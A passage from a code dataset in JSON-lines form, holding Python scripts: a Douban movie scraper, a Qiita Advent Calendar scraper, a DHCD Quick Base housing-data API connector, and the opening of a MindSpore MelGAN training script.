resize one picture\\n\\n')\n\nif dec is 1:\n\tone()\nelse:\n\tprint('Invalid')\n\n","sub_path":"image/img.py","file_name":"img.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118830421","text":"# -*- coding: utf-8 -*- \nimport urllib2\nimport re\nimport bs4\n\nheaders = ('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')\n\ndef get_sort_films(url):\n opener = urllib2.build_opener()\n opener.add_handler = headers\n content = opener.open(url).read().decode('utf-8')\n soup = bs4.BeautifulSoup(content)\n\n now_playing_film=soup.find('div' , {\"id\" : \"nowplaying\"}) # 获取正在上映电影\n\n list_content = now_playing_film.findAll('li', { \"class\" : \"list-item\" }) # 获取电影列表\n\n all_film_content = []\n\n for list_film in list_content:\n film_content = {}\n if (list_film.ul.li['class'] == ['poster']):\n film_content['film_name'] = list_film.ul.li.img['alt']\n film_content['film_release'] = list_film['data-release']\n film_content['film_actors'] = list_film['data-actors']\n film_content['film_director'] = list_film['data-director']\n film_content['film_href'] = list_film.ul.li.a['href']\n film_content['film_src'] = list_film.ul.li.a.img['src']\n if list_film.find('span', {'class','subject-rate'}):\n film_content['film_points'] = list_film.find('span', {'class','subject-rate'}).string.strip()\n if str(film_content['film_release']) == '2014':\n film_content['points'] = float(film_content['film_points'])+10\n else:\n film_content['points'] = float(film_content['film_points'])\n else:\n if str(film_content['film_release']) == '2014':\n film_content['points'] = 10\n else:\n film_content['points'] = 0\n film_content['film_points'] = u'暂无评分'\n\n stars = list_film.find('li', {'class' :'srating'}).span['class']\n\n if stars[0] != 'rating-star':\n film_content['film_stars'] = u'评价人数不足'\n else:\n original_film_stars=stars[1]\n re_film_stars=re.compile(r'^\\D*(\\d{2})$') # 用正则提取星数\n film_content['film_stars'] = str(int(re_film_stars.search(original_film_stars).groups()[0])/10)+'颗星'\n\n all_film_content.append(film_content)\n sort_all_film = sorted(all_film_content, key=lambda x:x['points'], reverse = True) # 将列表中字典元素按从大到小排列\n\n return sort_all_film\n","sub_path":"pyspider/douban_movie_spider2.py","file_name":"douban_movie_spider2.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363095671","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n''' Qiita Advent Calendar\n'''\n\nimport os, sys, pprint, re, time, csv, json, math, copy\nimport urlparse\nimport requests\nfrom bs4 import BeautifulSoup\n# see: https://www.crummy.com/software/BeautifulSoup/bs4/doc/\n# see: http://kondou.com/BS4/\n\n\nclass adventCalendar(object):\n '''\n '''\n interval = 1\n verbose = True\n year = 2017\n url_base = 'https://qiita.com'\n max_calendar_page = 100\n max_calendar_per_page = 20\n\n def __init__(self, year=None, interval=None, verbose=None):\n '''\n '''\n if year is not None:\n self.year = year\n\n if interval is not None:\n self.interval = interval\n\n if verbose is not None:\n self.verbose = verbose\n\n\n def __del__(self):\n '''\n '''\n pass\n\n\n def log(self, message, force=False):\n '''\n '''\n if force is not True and self.verbose is not True:\n return\n sys.stderr.write(\"LOG : %s\\n\" % (message))\n\n\n def getWeb(self, url):\n '''\n '''\n time.sleep(self.interval)\n soup = None\n try:\n session = requests.Session()\n response = session.get(url)\n # response = requests.get(url)\n html = response.content\n soup = BeautifulSoup(html, 'html.parser')\n except:\n pass\n\n if response.status_code >= 400:\n self.log('Failure (response status code is %s) : get URL = %s' % (response.status_code, url), force=True)\n return None\n\n if soup is None:\n self.log('Failure : get URL = %s' % (url), force=True)\n return None\n\n self.log('Success : get URL = %s' % (url))\n return soup\n\n\n def getCalendar(self, code):\n ''' カレンダー情報 取得\n '''\n url = 'https://qiita.com/advent-calendar/%s/%s' % (self.year, code)\n soup = self.getWeb(url)\n result = []\n\n for row in soup.find_all('td', class_='adventCalendarCalendar_day'):\n # author = row.find('div', class_='adventCalendarCalendar_author').find('a')\n author = row.find('div', class_='adventCalendarCalendar_author')\n if author is None:\n # self.log('no author')\n continue\n\n author = author.find('a')\n if author is None:\n # self.log('no author')\n continue\n\n m = re.match('^/(.*)$', author.get('href'))\n if m is None:\n # self.log('no author name')\n continue\n user = m.group(1)\n\n comment = row.find('div', class_='adventCalendarCalendar_comment').find('a')\n if comment is None:\n # self.log('no comment')\n continue\n\n title = comment.text\n\n url = comment.get('href')\n url_parsed = urlparse.urlparse(url)\n\n if url_parsed.netloc in ['goo.gl', 't.co', 'bit.ly', 'is.gd', 'wp.me']:\n # 短縮 URL リダイレクト先 URL 取得\n url_redirected = None\n try:\n response = requests.get(url, allow_redirects=True)\n url_redirected = response.url\n except:\n pass\n\n if url_redirected is None:\n self.log('Failure : redirect URL = %s' % (url))\n continue\n\n url = url_redirected\n url_parsed = urlparse.urlparse(url)\n\n # ドメインを反転させて格納\n netloc_list = url_parsed.netloc.split('.')\n netloc_list.reverse()\n netloc_list.append('')\n domain_reversed = '.'.join(netloc_list)\n\n # io.github.\n if re.match('^io\\.github\\.', domain_reversed) is not None:\n domain_reversed = 'io.github.'\n\n # com.tumblr.\n if re.match('^com\\.tumblr\\.', domain_reversed) is not None:\n domain_reversed = 'com.tumblr.'\n\n # com.wordpress.\n if re.match('^com\\.wordpress\\.', domain_reversed) is not None:\n domain_reversed = 'com.wordpress.'\n\n # jp.kc-cloud.\n if re.match('^jp\\.kc-cloud\\.', domain_reversed) is not None:\n domain_reversed = 'jp.kc-cloud.'\n\n # com.blogspot.\n if re.match('^com\\.blogspot\\.', domain_reversed) is not None:\n domain_reversed = 'com.blogspot.'\n if 
re.match('^ca\\.blogspot\\.', domain_reversed) is not None:\n domain_reversed = 'com.blogspot.'\n if re.match('^jp\\.blogspot\\.', domain_reversed) is not None:\n domain_reversed = 'com.blogspot.'\n\n # hatena.d.\n if re.match('^com\\.hatenablog\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^com\\.hatenadiary\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^jp\\.hatenablog\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^jp\\.hatenadiary\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^jp\\.hateblo\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if re.match('^com\\.hatena.d\\.', domain_reversed) is not None:\n domain_reversed = 'hatena.d.'\n if domain_reversed == 'jp.ne.hatena.d.':\n domain_reversed = 'hatena.d.'\n if domain_reversed == 'jp.ne.hatena.blog.':\n domain_reversed = 'hatena.d.'\n\n # com.fc2.blog.\n if re.match('^com\\.fc2.blog\\.', domain_reversed) is not None:\n domain_reversed = 'com.fc2.blog.'\n if re.match('^com\\.fc2.blog\\d+\\.', domain_reversed) is not None:\n domain_reversed = 'com.fc2.blog.'\n\n # com.medium.\n if domain_reversed == 'com.medium.':\n url = self.formatMediumURL(url)\n\n item = {\n 'title': title,\n 'user': user,\n 'url': url,\n 'domain': domain_reversed,\n }\n # yield item\n result.append(item)\n\n return result\n\n\n def findCalendarList(self, page):\n ''' page 指定 カレンダー 情報 取得\n '''\n url = 'https://qiita.com/advent-calendar/%s/calendars?page=%s' % (self.year, page)\n soup = self.getWeb(url)\n\n result = []\n for row in soup.find_all('td', class_='adventCalendarList_calendarTitle'):\n a = row.find_all('a').pop()\n name = a.text\n code = None\n m = re.match('^/advent-calendar/(\\d+)/(.*)$', a.get('href'))\n if m is not None:\n code = m.group(2)\n result.append({\n 'name': name,\n 'code': code,\n 'url': '%s%s' % (self.url_base, a.get('href')),\n })\n\n return result\n\n\n def findCalendarListAll(self, with_item=False, with_count_hatena_bookmark=False):\n ''' 全 カレンダー 情報 取得\n '''\n result = []\n\n for page in range(1, self.max_calendar_page + 1):\n rows = self.findCalendarList(page)\n result.extend(rows)\n if len(rows) < self.max_calendar_per_page:\n self.log('page=%s' % (page))\n break\n\n if with_item is True:\n # 記事情報 付与\n for row in result:\n row['item'] = self.getCalendar(row['code'])\n\n if with_count_hatena_bookmark is True:\n # はてブ数 付与\n for row in result:\n row = self.setCountHatenaBookmarkOnCalendar(row)\n\n return result\n\n\n def countHatenaBookmark(self, params):\n ''' はてなブックマーク数 取得\n\n see: http://developer.hatena.ne.jp/ja/documents/bookmark/apis/getcount\n '''\n url = 'http://api.b.st-hatena.com/entry.counts'\n response = requests.get(url, params=params)\n return json.loads(response.content)\n\n\n def setCountHatenaBookmarkOnCalendar(self, row):\n ''' カレンダーと各記事の はてなブックマーク数 設定\n '''\n self.log('setCountHatenaBookmarkOnCalendar : code = %s' % (row['code']))\n\n # URL 抽出\n url_list = []\n url_list.append(row['url']) # カレンダー\n for item in row['item']:\n url_list.append(item['url']) # 記事\n\n # はてブ数\n result = self.countHatenaBookmark({'url': url_list})\n row['count'] = result[row['url']] # カレンダー\n for item in row['item']:\n item['count'] = result[item['url']] # 記事\n\n return row\n\n\n def formatMediumURL(self, url):\n ''' Medium URL 整形\n\n NOTE: はてなブックマーク が整形後の URL でカウントされている為\n\n 
https://medium.com/@nakanokyohei/%E5%AD%90%E4%BE%9B%E3%81%AB%E3%82%B9%E3%83%9E%E3%83%BC%E3%83%88%E3%83%95%E3%82%A9%E3%83%B3%E3%82%92%E4%B8%8E%E3%81%88%E3%81%9F%E8%A9%B1-8bc737220720\n -> https://medium.com/@nakanokyohei/8bc737220720\n\n https://medium.com/sotayamashita/glitch-github-%E3%81%A7%E7%B0%A1%E5%8D%98%E3%81%AB%E3%82%A2%E3%83%97%E3%83%AA%E3%82%92%E5%85%AC%E9%96%8B-b75af068ec46\n -> https://medium.com/sotayamashita/b75af068ec46\n\n # 独自ドメイン設定\n https://medium.com/p/8f11f33bfa96\n -> https://blog.kadoppe.com/%E5%AD%A6%E3%81%B3-%E3%81%AB%E3%83%95%E3%82%A9%E3%83%BC%E3%82%AB%E3%82%B9%E3%82%92%E3%81%82%E3%81%A6%E3%81%9F%E6%97%A5%E5%A0%B1%E3%81%AE%E3%82%88%E3%81%86%E3%81%AA%E3%82%82%E3%81%AE%E3%82%92%E5%8B%9D%E6%89%8B%E3%81%AB%E6%9B%B8%E3%81%84%E3%81%A6%E3%82%8B%E8%A9%B1-8f11f33bfa96\n '''\n # m = re.match('^https://medium.com/p/(\\w+)$', url)\n m = re.match('^https://medium.com/p/([0-9a-f]+)$', url)\n if m is not None:\n # リダイレクタ\n response = requests.get(url, allow_redirects=True)\n # self.log('LOG : com.medium. : %s => %s' % (url, response.url))\n return response.url\n\n m = re.match('^https://medium.com/(@?[a-zA-Z0-9_\\-\\.]+)/([0-9a-f]+)$', url)\n if m is not None:\n # 変換不要\n # self.log('OK : com.medium. : url = %s' % (url))\n return url\n\n # m = re.match('^https://medium.com/(@?[-\\.\\w]+)/(.*)-(\\w+)$', url)\n m = re.match('^https://medium.com/(@?[a-zA-Z0-9_\\-\\.]+)/(.*)-([0-9a-f]+)$', url)\n if m is None:\n self.log('NG : com.medium. : url = %s' % (url))\n raise Exception\n else:\n # self.log('OK : com.medium. : url = %s' % (url))\n url = 'https://medium.com/%s/%s' % (m.group(1), m.group(3))\n # self.log('OK : com.medium. : url = %s' % (url))\n\n return url\n\n","sub_path":"qiita.py","file_name":"qiita.py","file_ext":"py","file_size_in_byte":11069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316421034","text":"\"\"\"\nModule provides the api connection class for pulling DHCD DFD data\non projects pending funding and development\nfrom https://octo.quickbase.com/db/\nQuickbase API\n\"\"\"\n\n\nimport sys, os\nimport string\n\n# Enable relative package imports when running this file as a script (i.e. 
for testing purposes).\npython_filepath = os.path.abspath(os.path.join(os.path.dirname(__file__),\n os.pardir, os.pardir))\nsys.path.append(python_filepath)\n\n\nfrom collections import OrderedDict\n\nfrom xml.etree.ElementTree import Element, ElementTree\nfrom xml.etree.ElementTree import fromstring as xml_fromstring\n\nfrom xmljson import parker as xml_to_json\n\nimport json\n\n\nfrom housinginsights.sources.base_project import ProjectBaseApiConn\nfrom housinginsights.sources.models.dhcd import APP_ID, TABLE_ID_MAPPING, \\\n APP_METADATA_FIELDS, \\\n TABLE_METADATA_FIELDS, \\\n DhcdResult, \\\n PROJECT_FIELDS_MAP,\\\n SUBSIDY_FIELDS_MAP\n\nINCLUDE_ALL_FIELDS = True\n\n\nclass DhcdApiConn(ProjectBaseApiConn):\n \"\"\"\n API Interface to the DHCD DFD data on projects\n pending funding and development.\n\n Inherits from BaseApiConn class.\n \"\"\"\n\n BASEURL = 'https://octo.quickbase.com/db'\n\n PARAMS_METADATA = {'a': 'API_GetSchema'}\n\n PARAMS_DATA_ALL_FIELDS = {'a': 'API_DoQuery', 'query': '{\\'1\\'.XEX.\\'0\\'}', 'clist': 'a', 'slist': '3'}\n\n PARAMS_DATA_DEFAULT_FIELDS = {'a': 'API_DoQuery', 'query': '{\\'1\\'.XEX.\\'0\\'}'}\n\n\n def __init__(self):\n\n super().__init__(DhcdApiConn.BASEURL)\n\n # unique_data_id format: 'dhcd_dfd_' + \n self._available_unique_data_ids = [ 'dhcd_dfd_projects', \n 'dhcd_dfd_properties' #,\n# 'dhcd_dfd_units', 'dhcd_dfd_loans', 'dhcd_dfd_modifications',\n# 'dhcd_dfd_lihtc_allocations', 'dhcd_dfd_construction_activity',\n# 'dhcd_dfd_funding_sources', 'dhcd_dfd_8609s', 'dhcd_dfd_8610s',\n# 'dhcd_dfd_source_use', 'dhcd_dfd_ami_levels', 'dhcd_dfd_fiscal_years',\n# 'dhcd_dfd_organizations', 'dhcd_dfd_teams', 'dhcd_dfd_project_managers',\n# 'dhcd_dfd_funding_increases', 'dhcd_dfd_lihtc_fees',\n# 'dhcd_dfd_lihtc___bins', 'dhcd_dfd_council_packages',\n# 'dhcd_dfd_policies_and_procedures', 'dhcd_dfd_dhcd_documents',\n# 'dhcd_dfd_images_icons'\n ]\n self._app_dbid = APP_ID\n self._table_names = {\n 'dhcd_dfd_projects': 'Projects',\n 'dhcd_dfd_properties': 'Properties' #,\n# 'dhcd_dfd_units': 'Units',\n# 'dhcd_dfd_loans': 'Loans',\n# 'dhcd_dfd_modifications': 'Modifications',\n# 'dhcd_dfd_lihtc_allocations': 'LIHTC Allocations',\n# 'dhcd_dfd_construction_activity': 'Construction Activity',\n# 'dhcd_dfd_funding_sources': 'Funding Sources',\n# 'dhcd_dfd_8609s': '8609s',\n# 'dhcd_dfd_8610s': '8610s',\n# 'dhcd_dfd_source_use': 'Source/Use',\n# 'dhcd_dfd_ami_levels': 'AMI Levels',\n# 'dhcd_dfd_fiscal_years': 'Fiscal Years',\n# 'dhcd_dfd_organizations': 'Organizations',\n# 'dhcd_dfd_teams': 'Teams'\n# 'dhcd_dfd_project_managers': 'Project Managers',\n# 'dhcd_dfd_funding_increases': 'Funding Increases',\n# 'dhcd_dfd_lihtc_fees': 'LIHTC Fees',\n# 'dhcd_dfd_lihtc___bins': 'LIHTC - BINs',\n# 'dhcd_dfd_council_packages': 'Council Packages',\n# 'dhcd_dfd_policies_and_procedures': 'Policies and Procedures',\n# 'dhcd_dfd_dhcd_documents': 'DHCD Documents',\n# 'dhcd_dfd_images_icons': 'Images/Icons'\n }\n self._urls = { unique_data_id: '/' + TABLE_ID_MAPPING[self._table_names[unique_data_id]] \\\n for unique_data_id in self._available_unique_data_ids }\n print(\"self._urls:\")\n print(self._urls)\n\n identifier_unallowed_chars = string.punctuation + string.whitespace\n replacement_underscores = ''.join('_' * len(identifier_unallowed_chars))\n self._identifier_translation_map = str.maketrans(identifier_unallowed_chars, replacement_underscores)\n\n self._fields = {}\n self._params = {}\n\n if INCLUDE_ALL_FIELDS:\n self._get_metadata()\n else:\n 
self._get_metadata(default_display_only=True)\n\n\n def _get_metadata(self, default_display_only=False):\n \"\"\"\n Retrieves metadata about the DHCD DFD Quick Base app and its member tables\n (including field metadata and relationships) and saves this in two CSV files.\n\n Also, for each unique data id corresponding to a table, (1) builds a field\n reference list of all relevant fields, and (2) sets the query parameter string\n (including the sort field parameter) used when saving table data in get_data(...).\n\n :param default_display_only: Indicates whether or not to only include default\n display fields in the field reference list;\n default is False (gets all available table fields).\n :type default_display_only: Boolean.\n \"\"\"\n output_path_dir = os.path.dirname(self.output_paths[self._available_unique_data_ids[0]])\n output_path_app_metadata = os.path.join(output_path_dir, '_dhcd_dfd_app_metadata.csv')\n output_path_table_metadata = os.path.join(output_path_dir, '_dhcd_dfd_table_metadata.csv')\n\n app_metadata_result = self.get('/' + self._app_dbid, params=DhcdApiConn.PARAMS_METADATA)\n app_tables_metadata_xml = xml_fromstring(app_metadata_result.text).findall('./table/chdbids/chdbid')\n\n app_metadata = OrderedDict()\n table_metadata = OrderedDict()\n field_count = 0\n for app_table_metadata in app_tables_metadata_xml:\n\n table_dbid = app_table_metadata.text\n\n table_metadata_result = self.get('/' + table_dbid, params=DhcdApiConn.PARAMS_METADATA)\n # Strip out singly-occurring line break tags to prevent truncation of multi-line formulas\n table_metadata_full = table_metadata_result.text.replace(\"
\n
\", \"
\\n
\")\n            table_metadata_full = table_metadata_full.replace(\"
\", \"\")\n table_metadata_xml_root = xml_fromstring(table_metadata_full)\n errcode = int(table_metadata_xml_root.find('./errcode').text)\n if errcode == 0:\n table_metadata_xml_orig = table_metadata_xml_root.find('./table/original')\n table_name = table_metadata_xml_root.find('./table/name').text\n table_name_snake_case = table_name.lower().translate(self._identifier_translation_map)\n unique_data_id = None\n if 'dhcd_dfd_'+table_name_snake_case in self._available_unique_data_ids:\n unique_data_id = 'dhcd_dfd_' + table_name_snake_case\n self._fields[unique_data_id] = []\n\n table_metadata_xml_fields = table_metadata_xml_root.findall('./table/fields/field')\n table_metadata[table_dbid] = OrderedDict()\n field_line_start = field_count + 2\n\n for field_xml in table_metadata_xml_fields:\n\n fid = int(field_xml.get('id'))\n table_metadata[table_dbid][fid] = OrderedDict()\n\n field_label = field_xml.find('label').text\n field_name = field_label.lower().translate(self._identifier_translation_map)\n\n # For any fields that belong to composite fields (e.g. address component fields),\n # resolve the full field name by prepending the parent field name\n parent_fid = None\n if field_xml.find('parentFieldID') is not None:\n parent_fid = int(field_xml.find('parentFieldID').text)\n if parent_fid in table_metadata[table_dbid]:\n parent_field_name = table_metadata[table_dbid][parent_fid]['field_name']\n else:\n parent_field_label = table_metadata_xml_root.find(\"./table/fields/field[@id='{}']/label\".format(str(parent_fid))).text\n parent_field_name = parent_field_label.lower().translate(self._identifier_translation_map)\n if parent_field_name[0].isdigit():\n parent_field_name = '_' + parent_field_name\n field_name = '__'.join([parent_field_name, field_name])\n\n if field_name[0].isdigit():\n field_name = '_' + field_name\n\n # For any composite fields (e.g. 
address fields), get child/component fields\n child_fids = []\n for child_field in field_xml.findall('./compositeFields/compositeField'):\n child_fids.append(child_field.get('id'))\n child_fids = '|'.join(child_fids) if len(child_fids) > 0 else None\n\n table_metadata[table_dbid][fid]['table_name'] = table_name\n table_metadata[table_dbid][fid]['field_name'] = field_name\n table_metadata[table_dbid][fid]['field_label'] = field_label\n table_metadata[table_dbid][fid]['field_id'] = str(fid)\n table_metadata[table_dbid][fid]['field_type'] = field_xml.get('field_type')\n table_metadata[table_dbid][fid]['base_type'] = field_xml.get('base_type')\n table_metadata[table_dbid][fid]['appears_by_default'] = field_xml.find('appears_by_default').text\n\n table_metadata[table_dbid][fid]['composite_field_parent_fid'] = parent_fid\n table_metadata[table_dbid][fid]['composite_field_child_fids'] = child_fids\n\n table_metadata[table_dbid][fid]['mode'] = field_xml.get('mode')\n\n table_metadata[table_dbid][fid]['formula'] = None\n if field_xml.find('formula') is not None:\n table_metadata[table_dbid][fid]['formula'] = field_xml.find('formula').text\n\n table_metadata[table_dbid][fid]['choices'] = None\n if field_xml.find('choices') is not None:\n table_metadata[table_dbid][fid]['choices'] = \"\"\n for choice in field_xml.findall('./choices/choice'):\n table_metadata[table_dbid][fid]['choices'] += \"\\n\" + choice.text \\\n if len(table_metadata[table_dbid][fid]['choices']) > 0 \\\n else choice.text\n\n table_metadata[table_dbid][fid]['lookup_target_fid'] = None\n table_metadata[table_dbid][fid]['lookup_source_fid'] = None\n if table_metadata[table_dbid][fid]['mode'] == 'lookup':\n if field_xml.find('lutfid') is not None:\n table_metadata[table_dbid][fid]['lookup_target_fid'] = field_xml.find('lutfid').text\n if field_xml.find('lusfid') is not None:\n table_metadata[table_dbid][fid]['lookup_source_fid'] = field_xml.find('lusfid').text\n\n table_metadata[table_dbid][fid]['dblink_target_dbid'] = None\n table_metadata[table_dbid][fid]['dblink_target_fid'] = None\n table_metadata[table_dbid][fid]['dblink_source_fid'] = None\n if table_metadata[table_dbid][fid]['mode'] == 'virtual' and \\\n table_metadata[table_dbid][fid]['field_type'] == 'dblink':\n if field_xml.find('target_dbid') is not None:\n table_metadata[table_dbid][fid]['dblink_target_dbid'] = field_xml.find('target_dbid').text\n if field_xml.find('target_fid') is not None:\n table_metadata[table_dbid][fid]['dblink_target_fid'] = field_xml.find('target_fid').text\n if field_xml.find('source_fid') is not None:\n table_metadata[table_dbid][fid]['dblink_source_fid'] = field_xml.find('source_fid').text\n table_metadata[table_dbid][fid]['fkey_table_app_dbid'] = None\n table_metadata[table_dbid][fid]['fkey_table_alias'] = None\n if field_xml.find('mastag') is not None:\n fkey_ref = field_xml.find('mastag').text.split('.')\n if len(fkey_ref) == 2:\n table_metadata[table_dbid][fid]['fkey_table_app_dbid'] = fkey_ref[0]\n table_metadata[table_dbid][fid]['fkey_table_alias'] = fkey_ref[1].lower()\n else:\n table_metadata[table_dbid][fid]['fkey_table_app_dbid'] = None\n table_metadata[table_dbid][fid]['fkey_table_alias'] = fkey_ref[0].lower()\n\n table_metadata[table_dbid][fid]['field_help'] = field_xml.find('fieldhelp').text\n\n # For each unique data id corresponding to a table,\n # build a list of all relevant fields\n if unique_data_id is not None and \\\n (not default_display_only or \\\n table_metadata[table_dbid][fid]['appears_by_default'] == '1'):\n 
self._fields[unique_data_id].append(field_name)\n\n field_count += 1\n\n field_line_end = field_count + 1\n\n app_metadata[table_dbid] = OrderedDict([\n\t\t\t\t\t ('table_name', table_name),\n ('table_dbid', table_dbid),\n ('table_alias', app_table_metadata.get('name')),\n ('key_fid', table_metadata_xml_orig.find('key_fid').text),\n ('default_sort_fid', table_metadata_xml_orig.find('def_sort_fid').text),\n ('default_sort_order', table_metadata_xml_orig.find('def_sort_order').text),\n ('single_record_name', table_metadata_xml_orig.find('single_record_name').text),\n ('plural_record_name', table_metadata_xml_orig.find('plural_record_name').text),\n ('field_metadata_line_start', field_line_start),\n ('field_metadata_line_end', field_line_end)\n ])\n\n if unique_data_id is not None and unique_data_id in self._fields:\n # While not strictly a field, Quick Base always includes final 'update_id':\n self._fields[unique_data_id].append('update_id')\n # Set the query parameter string (including the sort field parameter):\n if not default_display_only:\n self._params[unique_data_id] = DhcdApiConn.PARAMS_DATA_ALL_FIELDS\n else:\n self._params[unique_data_id] = DhcdApiConn.PARAMS_DATA_DEFAULT_FIELDS\n self._params[unique_data_id]['slist'] = app_metadata[table_dbid]['default_sort_fid']\n\n all_tables_field_metadata = [ list(field_metadata_row.values()) \\\n for all_field_metadata in table_metadata.values() \\\n for field_metadata_row in all_field_metadata.values() ]\n self.result_to_csv(TABLE_METADATA_FIELDS, all_tables_field_metadata, output_path_table_metadata)\n self.result_to_csv(APP_METADATA_FIELDS, list(list(d.values()) for d in app_metadata.values()), output_path_app_metadata)\n\n\n def get_data(self, unique_data_ids=None, sample=False, output_type='csv', **kwargs):\n \"\"\"\n Returns a JSON object of the entire data set.\n\n \"\"\"\n data_json = None\n db = kwargs.get('db', None)\n\n if unique_data_ids is None:\n unique_data_ids = self._available_unique_data_ids\n\n for u in unique_data_ids:\n if (u not in self._available_unique_data_ids):\n logging.info(\" The unique_data_id '{}' is not supported by the DhcdApiConn\".format(u))\n\n else:\n result = self.get(self._urls[u], params=self._params[u])\n\n if result.status_code != 200:\n err = \"An error occurred during request: status {0}\"\n raise Exception(err.format(result.status_code))\n\n data_xml_root = xml_fromstring(result.text)\n data_xml_records = data_xml_root.findall('record')\n data_json = xml_to_json.data(data_xml_root)\n\n if output_type == 'stdout':\n print(json.dumps(data_json, indent=4))\n\n elif output_type == 'csv':\n\n results = [ DhcdResult({e.tag: e.text for e in list(r)}, self._fields[u]).data for r in data_xml_records ]\n\n self.result_to_csv(self._fields[u], results, self.output_paths[u])\n \n #Convert to format expected by database\n if u == 'dhcd_dfd_properties':\n self.create_project_subsidy_csv('dhcd_dfd_properties', PROJECT_FIELDS_MAP, SUBSIDY_FIELDS_MAP, db)\n\n\n\n\n# For testing purposes (running this as a script):\nif __name__ == '__main__':\n d = DhcdApiConn()\n\n# unique_data_ids = ['dhcd_dfd_projects']\n unique_data_ids = None\n sample = False\n\n# output_type = 'stdout'\n output_type = 'csv'\n db = None\n\n d.get_data(unique_data_ids, sample, output_type, db=db)\n\n\n","sub_path":"python/housinginsights/sources/dhcd.py","file_name":"dhcd.py","file_ext":"py","file_size_in_byte":19145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32354588","text":"# 
Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"MelGAN train\"\"\"\nimport time\nimport os\n\nimport mindspore.nn as nn\nfrom mindspore.common import set_seed\nimport mindspore.common.dtype as mstype\nfrom mindspore.common.tensor import Tensor\nfrom mindspore.context import ParallelMode\nfrom mindspore.communication.management import init, get_rank, get_group_size\nimport mindspore.dataset as de\nimport mindspore.context as context\nfrom mindspore.train.loss_scale_manager import DynamicLossScaleManager\nfrom mindspore.train.callback import RunContext, ModelCheckpoint, CheckpointConfig, _InternalCallbackParam\nfrom mindspore.train.serialization import load_checkpoint, load_param_into_net\n\nfrom src.model_utils.config import config as cfg\nfrom src.model import MultiDiscriminator, Generator\nfrom src.trainonestep import TrainOneStepCellGEN, TrainOneStepCellDIS\nfrom src.loss import MelganLoss_G, MelganLoss_D\nfrom src.dataset import Generator1D\nfrom src.sampler import DistributedSampler\nfrom src.model_utils.moxing_adapter import moxing_wrapper\n\nset_seed(1)\n\nclass BuildGenNetwork(nn.Cell):\n \"\"\"build generator\"\"\"\n def __init__(self, network, criterion):\n super(BuildGenNetwork, self).__init__(auto_prefix=False)\n self.network = network\n self.criterion = criterion\n def construct(self, data):\n fake_wav = self.network(data)\n return fake_wav\n\nclass BuildDisNetwork(nn.Cell):\n \"\"\"build discriminator\"\"\"\n def __init__(self, network, criterion):\n super(BuildDisNetwork, self).__init__(auto_prefix=False)\n self.network = network\n self.criterion = criterion\n\n def construct(self, fake_wav, wav):\n y1 = self.network(fake_wav)\n y2 = self.network(wav)\n loss = self.criterion(y1, y2)\n return loss\n\n@moxing_wrapper()\ndef train():\n \"\"\"main train process\"\"\"\n # init distributed\n if cfg.run_distribute:\n device_id = int(os.getenv('DEVICE_ID', '0'))\n context.set_context(mode=context.GRAPH_MODE, device_target=\"Ascend\", device_id=device_id)\n init()\n cfg.rank = get_rank()\n cfg.group_size = get_group_size()\n context.reset_auto_parallel_context()\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True, device_num=8,\n parameter_broadcast=True)\n else:\n cfg.rank = 0\n cfg.group_size = 1\n context.set_context(mode=context.GRAPH_MODE, device_target=\"Ascend\", device_id=cfg.device_id)\n # get network and init\n net_D = MultiDiscriminator()\n net_G = Generator(alpha=cfg.leaky_alpha)\n\n criterion_G = MelganLoss_G()\n criterion_D = MelganLoss_D()\n\n gen_network_train = BuildGenNetwork(net_G, criterion_G)\n gen_network_train.set_train()\n dis_network_train_1 = BuildDisNetwork(net_D, criterion_G)\n dis_network_train_1.set_train()\n dis_network_train_2 = BuildDisNetwork(net_D, criterion_D)\n dis_network_train_2.set_train()\n scale_manager = DynamicLossScaleManager(init_loss_scale=2 ** 10, scale_factor=2, 
scale_window=2000)\n\n # optimizer\n opt_G = nn.Adam(params=net_G.trainable_params(), learning_rate=cfg.lr_g, beta1=cfg.beta1, beta2=cfg.beta2,\n weight_decay=cfg.weight_decay)\n opt_D = nn.Adam(params=net_D.trainable_params(), learning_rate=cfg.lr_d, beta1=cfg.beta1, beta2=cfg.beta2,\n weight_decay=cfg.weight_decay)\n if cfg.pre_trained:\n param_dict = load_checkpoint(cfg.checkpoint_path)\n load_param_into_net(net_G, param_dict)\n load_param_into_net(net_D, param_dict)\n\n gen_network_train_wrap = TrainOneStepCellGEN(gen_network_train, opt_G, dis_network_train_1, criterion_G)\n dis_network_train_wrap = TrainOneStepCellDIS(gen_network_train, dis_network_train_2, opt_D, criterion_D)\n\n # dataloader\n Wavmeldataset = Generator1D(cfg.data_path, cfg.train_length, cfg.hop_size)\n distributed_sampler = DistributedSampler(len(Wavmeldataset), cfg.group_size, cfg.rank, shuffle=True)\n dataset = de.GeneratorDataset(Wavmeldataset, [\"data\", \"wav\", \"datad\", \"wavd\"], sampler=distributed_sampler)\n dataset = dataset.batch(cfg.batch_size, drop_remainder=True)\n\n # checkpoint save\n config_ck = CheckpointConfig(save_checkpoint_steps=cfg.save_steps, keep_checkpoint_max=100000)\n ckpt_cb = 